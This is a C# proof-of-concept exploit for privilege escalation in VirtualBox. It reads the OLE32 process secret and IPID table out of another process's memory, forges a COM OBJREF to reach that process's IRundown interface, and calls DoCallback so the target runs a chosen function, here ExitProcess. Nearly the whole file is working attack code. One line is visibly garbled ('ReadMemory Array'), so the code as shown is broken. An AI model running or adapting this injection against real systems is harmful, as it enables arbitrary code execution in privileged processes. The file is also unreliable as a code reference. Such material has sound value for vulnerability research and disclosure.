﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

namespace PoC_VirtualBoxComInjection_EoP
{
    /// <summary>
    /// Reads memory from a target process and resolves combase.dll symbol addresses for it.
    /// </summary>
    /// <remarks>
    /// When the local combase.dll hashes to <see cref="COMBASE_MD5"/>, symbol addresses come from a
    /// hard-coded offset table added to the base of combase.dll in the <em>current</em> process.
    /// NOTE(review): this assumes combase.dll is mapped at the same base in the target — confirm.
    /// Otherwise a dbghelp-backed <see cref="ISymbolResolver"/> bound to the target process is used.
    /// </remarks>
    class ProcessReader : IDisposable
    {
        // Offsets from the combase.dll base, valid only for the build identified by COMBASE_MD5.
        static readonly Dictionary<string, long> _symbol_cache = new Dictionary<string, long>() {
            {"combase!CProcessSecret::s_fSecretInit",0x2DDFC4},
            {"combase!CProcessSecret::s_guidOle32Secret",0x2DDA00},
            {"CIPIDTable::_palloc",0x2DD890},
            {"combase!g_pMTAEmptyCtx",0x2DDA28},
        };

        // Base64 MD5 of the combase.dll build the offset table above was taken from.
        const string COMBASE_MD5 = "bCiVGCbLMzmjICJGlmiPJw==";

        private readonly NtProcess _process;
        private readonly long _combase_addr;
        // Null when the offset table is trusted; otherwise resolves symbols in the target process.
        private readonly ISymbolResolver _resolver;

        /// <summary>Returns the PEB address of the target process.</summary>
        public long GetProcessPeb()
        {
            return _process.PebAddress.ToInt64();
        }

        /// <summary>
        /// Returns the address of <paramref name="name"/> in the target process.
        /// </summary>
        /// <param name="name">Symbol name, e.g. "combase!g_pMTAEmptyCtx".</param>
        /// <returns>The symbol's address.</returns>
        /// <exception cref="ArgumentException">The symbol resolver returned a null address.</exception>
        /// <exception cref="KeyNotFoundException">No resolver is in use and the symbol isn't in the offset table.</exception>
        public long GetSymbolAddress(string name)
        {
            if (_resolver != null)
            {
                // The offset table doesn't apply to this combase build, so the resolver's answer must be used.
                long address = _resolver.GetAddressOfSymbol(name).ToInt64();
                if (address == 0)
                {
                    throw new ArgumentException($"Couldn't resolve symbol {name}");
                }
                return address;
            }
            return _symbol_cache[name] + _combase_addr;
        }

        /// <summary>Returns the TEB address of thread <paramref name="thread_id"/>.</summary>
        public long GetThreadTeb(uint thread_id)
        {
            using (var thread = NtThread.Open((int)thread_id, ThreadAccessRights.QueryLimitedInformation))
            {
                return thread.TebBaseAddress.ToInt64();
            }
        }

        /// <summary>Reads <paramref name="count"/> consecutive <typeparamref name="T"/> values from the target.</summary>
        public T[] ReadArray<T>(long address, int count) where T : struct
        {
            return _process.ReadMemory Array<T>(address, count);
        }

        /// <summary>Reads <paramref name="count"/> bytes at the address of symbol <paramref name="name"/>.</summary>
        public byte[] ReadMemory(string name, int count)
        {
            return ReadMemory(GetSymbolAddress(name), count);
        }

        /// <summary>Reads <paramref name="count"/> bytes at <paramref name="address"/> in the target.</summary>
        public byte[] ReadMemory(long address, int count)
        {
            return _process.ReadMemory(address, count);
        }

        /// <summary>Reads a single <typeparamref name="T"/> at <paramref name="address"/> in the target.</summary>
        public T ReadStruct<T>(long address) where T : struct
        {
            return _process.ReadMemory<T>(address);
        }

        /// <summary>Reads a single <typeparamref name="T"/> at the address of symbol <paramref name="name"/>.</summary>
        public T ReadStruct<T>(string name) where T : struct
        {
            return ReadStruct<T>(GetSymbolAddress(name));
        }

        /// <summary>
        /// Reads a NUL-terminated UTF-16 string from the target, one character at a time.
        /// </summary>
        public string ReadUnicodeStringZ(long address)
        {
            StringBuilder builder = new StringBuilder();
            char c = ReadStruct<char>(address);
            while (c != 0)
            {
                builder.Append(c);
                address += 2;
                c = ReadStruct<char>(address);
            }
            return builder.ToString();
        }

        /// <summary>Releases the symbol resolver (if any) and the process handle.</summary>
        public void Dispose()
        {
            _resolver?.Dispose();
            _process?.Dispose();
        }

        /// <summary>
        /// Waits for the target process to exit and returns its exit status.
        /// </summary>
        /// <exception cref="ArgumentException">The wait did not return STATUS_SUCCESS.</exception>
        public int WaitForExit()
        {
            // NOTE(review): NtApiDotNet's Wait(int) timeout is presumably in seconds — confirm.
            if (_process.Wait(10) != NtStatus.STATUS_SUCCESS)
            {
                throw new ArgumentException("Target process didn't exit");
            }
            return _process.ExitStatus;
        }

        /// <summary>
        /// Opens the target process and chooses how symbols will be resolved.
        /// </summary>
        /// <param name="pid">Target process id.</param>
        /// <param name="symbol_path">dbghelp symbol path, used only when the combase hash doesn't match.</param>
        /// <exception cref="ArgumentException">The target's bitness differs from this process.</exception>
        public ProcessReader(uint pid, string symbol_path)
        {
            // Open the target first: the fallback symbol resolver needs a live process handle.
            _process = NtProcess.Open((int)pid, ProcessAccessRights.VmRead | ProcessAccessRights.QueryLimitedInformation | ProcessAccessRights.Synchronize);
            try
            {
                if (_process.Is64Bit != Environment.Is64BitProcess)
                {
                    throw new ArgumentException("Mismatched process bitness");
                }

                using (var lib = SafeLoadLibraryHandle.GetModuleHandle("combase.dll"))
                using (var md5 = MD5.Create())
                {
                    string hash = Convert.ToBase64String(md5.ComputeHash(File.ReadAllBytes(lib.FullPath)));
                    if (hash != COMBASE_MD5)
                    {
                        Console.WriteLine("COMBASE hash doesn't match {0}. Fallback to using symbol resolver.", hash);
                        _resolver = SymbolResolver.Create(_process, "dbghelp.dll", symbol_path);
                    }
                    _combase_addr = lib.DangerousGetHandle().ToInt64();
                }
            }
            catch
            {
                // Dispose() is never called on a half-constructed object, so release the handles here.
                _resolver?.Dispose();
                _process.Dispose();
                throw;
            }
        }
    }

    /// <summary>
    /// Argument block passed to <c>IRundown.DoCallback</c>.
    /// </summary>
    /// <remarks>
    /// Sequential layout: field order and sizes are load-bearing because the block is marshaled
    /// to native code. In Main, pfnCallback/pParam carry the function to invoke and its argument,
    /// pServerCtx carries the value read from combase!g_pMTAEmptyCtx, and guidProcessSecret
    /// carries the target's OLE32 secret.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    class XAptCallback
    {
        /* Offset: 0 */
        public ulong pfnCallback;
        /* Offset: 8 */
        public ulong pParam;
        /* Offset: 16 */
        public ulong pServerCtx;
        /* Offset: 24 */
        public ulong pUnk;
        /* Offset: 32 */
        public Guid iid;
        /* Offset: 48 */
        public int iMethod;
        /* Offset: 52 */
        public Guid guidProcessSecret;
    };

    /// <summary>
    /// COM interop declaration of the IRundown interface (IID 00000134-0000-0000-c000-000000000046).
    /// </summary>
    /// <remarks>
    /// Method order must match the native vtable, so the unused methods are kept as placeholders.
    /// Only DoCallback is called in this file. It uses PreserveSig, so its HRESULT is returned
    /// as an IntPtr instead of being thrown as an exception.
    /// </remarks>
    [Guid("00000134-0000-0000-c000-000000000046")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    interface IRundown
    {
        void RemQueryInterface();
        void RemAddRef();
        void RemRelease();
        void RemQueryInterface2();
        void RemChangeRef();
        [PreserveSig]
        IntPtr DoCallback(/* Stack Offset: 8 */ [In] XAptCallback p0);
        void DoNonreentrantCallback(/* Stack Offset: 8 */ [In] XAptCallback p0);
        void AcknowledgeMarshalingSets();
        void GetInterfaceNameFromIPID();
        void RundownOid();
    }

    static class Program
    {
        /// <summary>
        /// Reads combase's OLE32 process secret GUID from the target process.
        /// </summary>
        /// <param name="client">Reader attached to the target process.</param>
        /// <returns>The 16 bytes stored at combase!CProcessSecret::s_guidOle32Secret, as a Guid.</returns>
        /// <exception cref="Exception">The s_fSecretInit flag byte reads as zero.</exception>
        static Guid ReadOle32Secret(ProcessReader client)
        {
            bool initialized = client.ReadStruct<byte>("combase!CProcessSecret::s_fSecretInit") != 0;
            if (!initialized)
            {
                throw new Exception("Process secret doesn't seem to be initialized");
            }

            byte[] secretBytes = client.ReadMemory("combase!CProcessSecret::s_guidOle32Secret", 16);
            return new Guid(secretBytes);
        }

        /// <summary>
        /// One in-use IPID table entry recovered from the target: the IPID, its interface IID,
        /// and the OXID of the owning OXID entry.
        /// </summary>
        class COMIPIDEntry
        {
            public Guid Ipid { get; private set; }
            public Guid Iid { get; private set; }
            public Guid Oxid { get; private set; }

            // The apartment id is the 16-bit value in bytes 6-7 of the IPID's byte representation.
            private static uint GetApartmentIdFromIPid(Guid ipid)
            {
                return BitConverter.ToUInt16(ipid.ToByteArray(), 6);
            }

            public uint ApartmentId { get { return GetApartmentIdFromIPid(Ipid); } }

            // Apartment ids 0 and 0xFFFF are excluded; every other value is treated as an STA.
            public bool IsSta { get { uint appid = ApartmentId; return appid > 0 && appid < 0xFFFF; } }

            /// <summary>
            /// Serializes a standard OBJREF referencing this IPID, for use in an "objref:" moniker.
            /// </summary>
            /// <returns>
            /// 68 bytes: signature, flags, IID, STDOBJREF (flags, public refs, OXID, random OID, IPID),
            /// then an empty dual-string array.
            /// </returns>
            public byte[] ToObjref()
            {
                using (MemoryStream stm = new MemoryStream())
                using (BinaryWriter writer = new BinaryWriter(stm))
                using (RandomNumberGenerator rng = RandomNumberGenerator.Create())
                {
                    writer.Write(Encoding.ASCII.GetBytes("MEOW"));  // OBJREF signature
                    writer.Write(1);                                // OBJREF flags: standard
                    writer.Write(Iid.ToByteArray());
                    writer.Write(0);                                // STDOBJREF flags
                    writer.Write(1);                                // STDOBJREF public reference count
                    writer.Write(Oxid.ToByteArray(), 0, 8);         // OXID is 64-bit: first 8 bytes of the Guid
                    byte[] oid = new byte[8];
                    rng.GetBytes(oid);                              // arbitrary OID
                    writer.Write(oid);
                    writer.Write(Ipid.ToByteArray());
                    writer.Write(0);                                // empty dual-string array (wNumEntries = 0, wSecurityOffset = 0)
                    writer.Flush();
                    return stm.ToArray();
                }
            }

            public COMIPIDEntry(Guid ipid, Guid iid, Guid oxid)
            {
                Ipid = ipid;
                Iid = iid;
                Oxid = oxid;
            }
        }

        /// <summary>
        /// Native page-list entry as embedded in <see cref="CInternalPageAllocator"/>.
        /// </summary>
        /// <remarks>Sequential layout; field order and sizes must mirror the target's memory.</remarks>
        [StructLayout(LayoutKind.Sequential)]
        struct PageEntry
        {
            public IntPtr pNext;
            public int dwFlag;
        };

        /// <summary>
        /// Read-only view of a native page allocator read from the target process.
        /// </summary>
        interface IPageAllocator
        {
            // Number of pages in the allocator's page list.
            int Pages { get; }
            // Size in bytes of one entry within a page.
            int EntrySize { get; }
            // Number of entries stored in each page.
            int EntriesPerPage { get; }
            // Reads the array of page pointers from the target process.
            IntPtr[] ReadPages(ProcessReader client);
        }

        /// <summary>
        /// Native layout of combase's internal page allocator, read raw from the target process.
        /// </summary>
        /// <remarks>
        /// The field list mirrors the target's in-memory structure and must not be reordered.
        /// The <see cref="IPageAllocator"/> members only project those fields.
        /// </remarks>
        [StructLayout(LayoutKind.Sequential)]
        struct CInternalPageAllocator : IPageAllocator
        {
            public int _cPages;
            public IntPtr _pPageListStart;
            public IntPtr _pPageListEnd;
            public int _dwFlags;
            public PageEntry _ListHead;
            public IntPtr _cEntries;
            public IntPtr _cbPerEntry;
            public ushort _cEntriesPerPage;
            public IntPtr _pLock;

            int IPageAllocator.Pages => _cPages;

            // Stored pointer-sized natively; narrowed to int for callers.
            int IPageAllocator.EntrySize => _cbPerEntry.ToInt32();

            int IPageAllocator.EntriesPerPage => _cEntriesPerPage;

            // _pPageListStart points at an array of _cPages page pointers in the target.
            IntPtr[] IPageAllocator.ReadPages(ProcessReader client) =>
                client.ReadArray<IntPtr>(_pPageListStart.ToInt64(), _cPages);
        }

        /// <summary>
        /// Native layout of the outer page allocator, which wraps a <see cref="CInternalPageAllocator"/>.
        /// </summary>
        /// <remarks>
        /// Sequential layout; field order and sizes must mirror the target's memory.
        /// Not referenced elsewhere in the visible code.
        /// </remarks>
        [StructLayout(LayoutKind.Sequential)]
        struct CPageAllocator
        {
            public CInternalPageAllocator _pgalloc;
            public IntPtr _hHeap;
            public int _cbPerEntry;
            public int _lNumEntries;
        }

        /// <summary>
        /// Snapshot of a remote page allocator: its page pointers plus entry geometry.
        /// </summary>
        private class PageAllocator
        {
            public IntPtr[] Pages { get; private set; }
            public int EntrySize { get; private set; }
            public int EntriesPerPage { get; private set; }

            /// <param name="client">Reader attached to the target process.</param>
            /// <param name="ipid_table">Address of the <see cref="CInternalPageAllocator"/> in the target.</param>
            public PageAllocator(ProcessReader client, long ipid_table)
            {
                CInternalPageAllocator native = client.ReadStruct<CInternalPageAllocator>(ipid_table);
                IPageAllocator view = native;
                Pages = view.ReadPages(client);
                EntrySize = view.EntrySize;
                EntriesPerPage = view.EntriesPerPage;
            }
        }

        /// <summary>
        /// Read-only view of a native OXID entry read from the target process
        /// (implemented by <see cref="OXIDEntryNative"/>).
        /// </summary>
        internal interface IOXIDEntry
        {
            // Process id recorded in the entry.
            int Pid { get; }
            // Thread id recorded in the entry.
            int Tid { get; }
            // The entry's OXID GUID (used as the OXID in COMIPIDEntry).
            Guid MOxid { get; }
            // The entry's machine id value.
            long Mid { get; }
            // The entry's server STA handle field.
            IntPtr ServerSTAHwnd { get; }
        }

        /// <summary>
        /// Native COM version pair embedded in <see cref="OXIDEntryNative"/>.
        /// </summary>
        /// <remarks>Sequential layout; field order and sizes must mirror the target's memory.</remarks>
        [StructLayout(LayoutKind.Sequential)]
        struct COMVERSION
        {
            public ushort MajorVersion;
            public ushort MinorVersion;
        }

        /// <summary>
        /// Native layout of a combase OXID entry, filled by a raw memory read from the target.
        /// </summary>
        /// <remarks>
        /// The field list mirrors the target's in-memory structure and must not be reordered.
        /// NOTE(review): the layout is presumably specific to a particular combase build — confirm.
        /// The <see cref="IOXIDEntry"/> members project a subset of the fields.
        /// </remarks>
        [StructLayout(LayoutKind.Sequential)]
        struct OXIDEntryNative : IOXIDEntry
        {
            public IntPtr _pNext;
            public IntPtr _pPrev;
            public int _dwPid;
            public int _dwTid;
            public Guid _moxid;
            public long _mid;
            public Guid _ipidRundown;
            public int _dwFlags;
            public IntPtr _hServerSTA;
            public IntPtr _pParentApt;
            public IntPtr _pSharedDefaultHandle;
            public IntPtr _pAuthId;
            public IntPtr _pBinding;
            public int _dwAuthnHint;
            public int _dwAuthnSvc;
            public IntPtr _pMIDEntry;
            public IntPtr _pRUSTA;
            public int _cRefs;
            public IntPtr _hComplete;
            public int _cCalls;
            public int _cResolverRef;
            public int _dwExpiredTime;
            public COMVERSION _version;
            public IntPtr _pAppContainerServerSecurityDescriptor;
            public int _ulMarshaledTargetInfoLength;
            public IntPtr _pMarshaledTargetInfo;
            public IntPtr _pszServerPackageFullName;
            public Guid _guidProcessIdentifier;

            int IOXIDEntry.Pid => _dwPid;

            int IOXIDEntry.Tid => _dwTid;

            Guid IOXIDEntry.MOxid => _moxid;

            long IOXIDEntry.Mid => _mid;

            IntPtr IOXIDEntry.ServerSTAHwnd => _hServerSTA;
        }

        /// <summary>
        /// Read-only view of a native IPID table entry read from the target process
        /// (implemented by <see cref="IPIDEntryNative"/>).
        /// </summary>
        internal interface IPIDEntryNativeInterface
        {
            // Raw entry flags; ParseIPIDEntries skips entries whose flags are 0 or 0xF1EEF1EE.
            uint Flags { get; }
            // Interface pointer stored in the entry (a target-process address).
            IntPtr Interface { get; }
            // Stub pointer stored in the entry (a target-process address).
            IntPtr Stub { get; }
            // The interface pointer identifier.
            Guid Ipid { get; }
            // The interface IID.
            Guid Iid { get; }
            int StrongRefs { get; }
            int WeakRefs { get; }
            int PrivateRefs { get; }
            // Reads the OXID entry this IPID entry points at from the target process.
            IOXIDEntry GetOxidEntry(ProcessReader client);
        }

        /// <summary>
        /// Native layout of one IPID table entry, as stored in the pages of CIPIDTable::_palloc.
        /// </summary>
        /// <remarks>
        /// The field list mirrors the target's in-memory structure and must not be reordered.
        /// The <see cref="IPIDEntryNativeInterface"/> members project the fields.
        /// </remarks>
        [StructLayout(LayoutKind.Sequential)]
        struct IPIDEntryNative : IPIDEntryNativeInterface
        {
            public IntPtr pNextIPID;
            public uint dwFlags;
            public int cStrongRefs;
            public int cWeakRefs;
            public int cPrivateRefs;
            public IntPtr pv;
            public IntPtr pStub;
            public IntPtr pOXIDEntry;
            public Guid ipid;
            public Guid iid;
            public IntPtr pChnl;
            public IntPtr pIRCEntry;
            public IntPtr pOIDFLink;
            public IntPtr pOIDBLink;

            uint IPIDEntryNativeInterface.Flags => dwFlags;

            IntPtr IPIDEntryNativeInterface.Interface => pv;

            IntPtr IPIDEntryNativeInterface.Stub => pStub;

            Guid IPIDEntryNativeInterface.Ipid => ipid;

            Guid IPIDEntryNativeInterface.Iid => iid;

            int IPIDEntryNativeInterface.StrongRefs => cStrongRefs;

            int IPIDEntryNativeInterface.WeakRefs => cWeakRefs;

            int IPIDEntryNativeInterface.PrivateRefs => cPrivateRefs;

            // pOXIDEntry is an address in the target process, so it is dereferenced through the reader.
            IOXIDEntry IPIDEntryNativeInterface.GetOxidEntry(ProcessReader client) =>
                client.ReadStruct<OXIDEntryNative>(pOXIDEntry.ToInt64());
        }

        /// <summary>
        /// Walks the IPID table (the page allocator at symbol "CIPIDTable::_palloc") in the target
        /// process and collects every in-use entry whose OXID entry could be read.
        /// </summary>
        /// <param name="client">Reader attached to the target process.</param>
        /// <returns>
        /// The recovered entries. The list is empty when the allocator has no pages, or when its
        /// entry size is smaller than <see cref="IPIDEntryNative"/>.
        /// </returns>
        static List<COMIPIDEntry> ParseIPIDEntries(ProcessReader client)
        {
            List<COMIPIDEntry> entries = new List<COMIPIDEntry>();
            PageAllocator palloc = new PageAllocator(client, client.GetSymbolAddress("CIPIDTable::_palloc"));
            // A too-small entry size means the native layout doesn't match; reading would misparse.
            if (palloc.Pages.Length == 0 || palloc.EntrySize < Marshal.SizeOf(typeof(IPIDEntryNative)))
            {
                return entries;
            }

            // Every page has the same geometry, so the per-page read size is loop-invariant.
            int total_size = palloc.EntriesPerPage * palloc.EntrySize;
            foreach (IntPtr page in palloc.Pages)
            {
                // A null page pointer can't be read; skip it rather than aborting the whole walk.
                if (page == IntPtr.Zero)
                {
                    continue;
                }

                byte[] data = client.ReadMemory(page.ToInt64(), total_size);
                if (data.Length < total_size)
                {
                    continue;
                }

                using (var buf = new SafeHGlobalBuffer(data))
                {
                    for (int entry_index = 0; entry_index < palloc.EntriesPerPage; ++entry_index)
                    {
                        IPIDEntryNativeInterface ipid_entry = buf.Read<IPIDEntryNative>((ulong)(entry_index * palloc.EntrySize));
                        // Entries flagged 0 or 0xF1EEF1EE are skipped.
                        // NOTE(review): presumably these mark unused/free slots — confirm.
                        if ((ipid_entry.Flags != 0xF1EEF1EE) && (ipid_entry.Flags != 0))
                        {
                            try
                            {
                                IOXIDEntry oxid = ipid_entry.GetOxidEntry(client);
                                entries.Add(new COMIPIDEntry(ipid_entry.Ipid, ipid_entry.Iid, oxid.MOxid));
                            }
                            catch
                            {
                                // Best effort: an entry whose OXID pointer can't be read from the
                                // target is skipped so one bad entry doesn't abort the whole scan.
                            }
                        }
                    }
                }
            }

            return entries;
        }

        /// <summary>
        /// Looks up an exported function's address in <paramref name="dllname"/> as loaded in this process.
        /// </summary>
        /// <param name="dllname">Module to load.</param>
        /// <param name="name">Export name.</param>
        /// <returns>The export's address in the current process.</returns>
        /// <exception cref="ArgumentException">The export was not found.</exception>
        static IntPtr GetFunctionAddress(string dllname, string name)
        {
            IntPtr address;
            using (var module = SafeLoadLibraryHandle.LoadLibrary(dllname))
            {
                address = module.GetProcAddress(name);
            }

            if (address != IntPtr.Zero)
            {
                return address;
            }
            throw new ArgumentException($"Couldn't find {name} in {dllname}");
        }

        /// <summary>
        /// Native UNICODE_STRING layout: byte length, byte capacity, and buffer pointer.
        /// </summary>
        /// <remarks>
        /// Sequential layout; field order and sizes must mirror the native structure.
        /// Not referenced elsewhere in the visible code.
        /// </remarks>
        [StructLayout(LayoutKind.Sequential)]
        struct UNICODE_STRING
        {
            public ushort Length;
            public ushort MaximumLength;
            public UIntPtr Buffer;
        }

        /// <summary>
        /// Chooses the dbghelp symbol path.
        /// </summary>
        /// <returns>
        /// The value of _NT_SYMBOL_PATH when it is set to something non-blank; otherwise
        /// %ProgramData%\dbg\sym (CommonApplicationData combined with "dbg" and "sym").
        /// </returns>
        static string GetSymbolPath()
        {
            string fromEnvironment = Environment.GetEnvironmentVariable("_NT_SYMBOL_PATH");
            return string.IsNullOrWhiteSpace(fromEnvironment)
                ? Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "dbg", "sym")
                : fromEnvironment;
        }

        // Passed as the callback parameter in Main; the target's exit status is compared
        // against it to decide whether the callback ran.
        const int EXPECTED_EXIT_CODE = 12345678;

        /// <summary>
        /// Entry point. The first argument is the target process id.
        /// </summary>
        /// <remarks>
        /// Flow:
        /// 1. Read the target's OLE32 secret.
        /// 2. Collect its STA IRundown IPIDs and bind to the first one via an "objref:" moniker.
        /// 3. Call IRundown.DoCallback with kernel32!ExitProcess as the callback and
        ///    EXPECTED_EXIT_CODE as its parameter.
        /// 4. Report success when the target's exit status equals EXPECTED_EXIT_CODE.
        /// Any exception is caught and printed.
        /// </remarks>
        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    Console.WriteLine("Usage: poc PID");
                    return;
                }

                using (ProcessReader client = new ProcessReader(uint.Parse(args[0]), GetSymbolPath()))
                {
                    Guid secret = ReadOle32Secret(client);
                    Console.WriteLine("Secret: {0}", secret);
                    // Keep only IRundown entries that live in an STA.
                    Guid irundown_iid = new Guid("00000134-0000-0000-c000-000000000046");
                    var ipids = ParseIPIDEntries(client).Where(i => i.Iid == irundown_iid && i.IsSta).ToList();
                    foreach (var ipid in ipids)
                    {
                        Console.WriteLine("{0} - {1} - {2}", ipid.Ipid, ipid.Iid, ipid.Oxid);
                    }

                    if (ipids.Count == 0)
                    {
                        throw new Exception("No IRundown IPIDs found");
                    }

                    // Value of the pointer stored at combase!g_pMTAEmptyCtx in the target; used as the callback's server context.
                    ulong context = (ulong)(client.ReadStruct<IntPtr>("combase!g_pMTAEmptyCtx").ToInt64());
                    IRundown rundown = (IRundown)Marshal.BindToMoniker($"objref:{Convert.ToBase64String(ipids[0].ToObjref())}:");
                    // Resolved in this process. NOTE(review): assumes kernel32.dll shares its base address with the target — confirm.
                    IntPtr func = GetFunctionAddress("kernel32.dll", "ExitProcess");

                    XAptCallback callback = new XAptCallback()
                    {
                        guidProcessSecret = secret,
                        pServerCtx = context,
                        pfnCallback = (ulong)func.ToInt64(),
                        pParam = EXPECTED_EXIT_CODE
                    };
                    // DoCallback is PreserveSig, so the HRESULT is printed rather than thrown.
                    Console.WriteLine("Result: {0:X}", rundown.DoCallback(callback).ToInt64());
                    if (client.WaitForExit() == EXPECTED_EXIT_CODE)
                    {
                        Console.WriteLine("Success");
                    }
                    else
                    {
                        Console.WriteLine("Error, exit code doesn't match expected");
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
